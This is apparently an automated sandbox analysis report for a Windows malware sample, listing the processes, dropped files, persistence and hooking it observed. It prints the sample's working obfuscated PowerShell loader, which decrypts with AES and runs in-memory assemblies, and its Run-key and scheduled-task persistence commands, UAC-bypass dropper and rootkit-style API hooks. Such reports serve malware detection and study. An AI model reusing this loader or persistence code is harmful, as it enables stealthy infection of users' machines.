Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](7
2)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](10
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'S'+'i'+
'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Cha
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[Char](11
7)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Cha
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83
)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000025EE91CA7DD push rcx; retf 003Fh 18_3_0000025EE91CA7DE
Source: C:\Windows\System32\conhost.exe Code function: 19_3_000001AD31CAA7DD push rcx; retf 003Fh 19_3_000001AD31CAA7DE
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00000113DB11F99C pushfd ; ret 20_2_00000113DB11F99D
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00007FF7C14D1C7A push ebx; ret 20_2_00007FF7C14D1CEA
Source: C:\Windows\System32\conhost.exe Code function: 30_2_0000021E7B55F99C pushfd ; ret 30_2_0000021E7B55F99D
Source: C:\Windows\System32\conhost.exe Code function: 36_3_00000236C6DDA7DD push rcx; retf 003Fh 36_3_00000236C6DDA7DE
Source: C:\Windows\System32\cmd.exe Code function: 44_3_0000015829E8A7DD push rcx; retf 003Fh 44_3_0000015829E8A7DE
Source: C:\Windows\System32\conhost.exe Code function: 45_3_000001D643A7A7DD push rcx; retf 003Fh 45_3_000001D643A7A7DE
Source: C:\Windows\System32\conhost.exe Code function: 58_3_000002063183A7DD push rcx; retf 003Fh 58_3_000002063183A7DE
Source: C:\Windows\System32\conhost.exe Code function: 69_3_000001CCE365A7DD push rcx; retf 003Fh 69_3_000001CCE365A7DE
Source: C:\Windows\System32\conhost.exe Code function: 70_3_000001858EA2A7DD push rcx; retf 003Fh 70_3_000001858EA2A7DE
Source: C:\Windows\System32\conhost.exe Code function: 73_3_000002942EBFA7DD push rcx; retf 003Fh 73_3_000002942EBFA7DE
Source: C:\Windows\System32\conhost.exe Code function: 83_3_000001C8A039A7DD push rcx; retf 003Fh 83_3_000001C8A039A7DE
Source: C:\Windows\System32\conhost.exe Code function: 87_3_000001E5EF04A7DD push rcx; retf 003Fh 87_3_000001E5EF04A7DE
Source: C:\Windows\System32\dllhost.exe Code function: 96_3_000002ADD624A7DD push rcx; retf 003Fh 96_3_000002ADD624A7DE
Source: C:\Windows\System32\conhost.exe Code function: 99_3_0000021C0EE6A7DD push rcx; retf 003Fh 99_3_0000021C0EE6A7DE
Source: C:\Windows\System32\winlogon.exe Code function: 101_3_000001FC6039A7DD push rcx; retf 003Fh 101_3_000001FC6039A7DE
Source: C:\Windows\System32\lsass.exe Code function: 103_3_00000161C735A7DD push rcx; retf 003Fh 103_3_00000161C735A7DE

Persistence and Installation Behavior

Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
Source: C:\Users\user\Desktop\e7WMhx18XN.exe File created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe
Source: C:\Users\user\Desktop\e7WMhx18XN.exe File created: C:\Users\user\AppData\Local\Temp\paint.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
